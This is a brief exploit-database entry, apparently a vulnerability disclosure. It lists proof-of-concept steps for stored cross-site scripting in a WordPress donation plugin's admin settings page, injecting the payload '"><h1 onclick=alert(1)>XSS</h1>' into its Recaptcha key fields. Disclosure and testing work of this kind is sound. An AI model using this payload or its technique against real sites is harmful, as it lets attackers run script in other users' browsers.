## https://sploitus.com/exploit?id=WPEX-ID:7A8A834A-E5D7-4678-9D35-4390D1200437
1. Navigate to
http://example.com/wp-admin/admin.php?page=idonate-setting-admin
2. Enter payload `"><h1 onclick=alert(1)>XSS</h1>` in Recaptcha secret key
and in Recaptcha Site key
3. Click on save changes.
4. While clicking on the payload text, XSS will trigger.